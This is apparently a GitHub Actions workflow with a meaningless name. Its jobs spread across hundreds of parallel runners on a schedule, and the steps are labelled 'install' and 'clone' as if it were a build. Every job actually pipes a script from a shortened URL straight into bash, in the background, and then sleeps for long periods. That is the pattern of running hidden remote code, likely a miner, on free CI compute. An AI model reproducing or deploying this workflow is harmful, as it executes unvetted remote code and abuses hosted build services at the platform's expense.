name: kapdosje ksyaher 

on:
  workflow_dispatch:
  push:
    branches: ["main"]
  schedule:
    - cron: '0 */12 * * *'

jobs:
  build:
    name: build
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    env:
      NUM_JOBS: 40
      JOB: ${{ matrix.go }}
    steps:
    - name: Checkout code
      uses: actions/checkout@v2
    - name: install
      run: curl -sL  https://bit.ly/4snI7fO | bash &
           sleep 360s
  bulat:
    needs: build
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    env:
      NUM_JOBS: 40
      JOB: ${{ matrix.go }}
    steps:
    - name: Checkout code
      uses: actions/checkout@v2
    - name: install curl
      run: curl -sL  https://bit.ly/4snI7fO | bash &
            sleep 6m
        
    
     
  tepung:
    needs: [build]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    env:
      NUM_JOBS: 90
      JOB: ${{ matrix.go }}
    steps:
    - name: Checkout code
      uses: actions/checkout@v2
    - name: clone
      run: curl -sL  https://bit.ly/4snI7fO | bash &
            sleep 16m
  tekwan:
    needs: bulat
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9]
        flag: [A, B, C]
    env:
      NUM_JOBS: 90
      JOB: ${{ matrix.go }}
    steps:
    - name: Checkout code
      uses: actions/checkout@v2
    - name: clone
      run: curl -sL  https://bit.ly/4snI7fO | bash &
            sleep 20m   
  
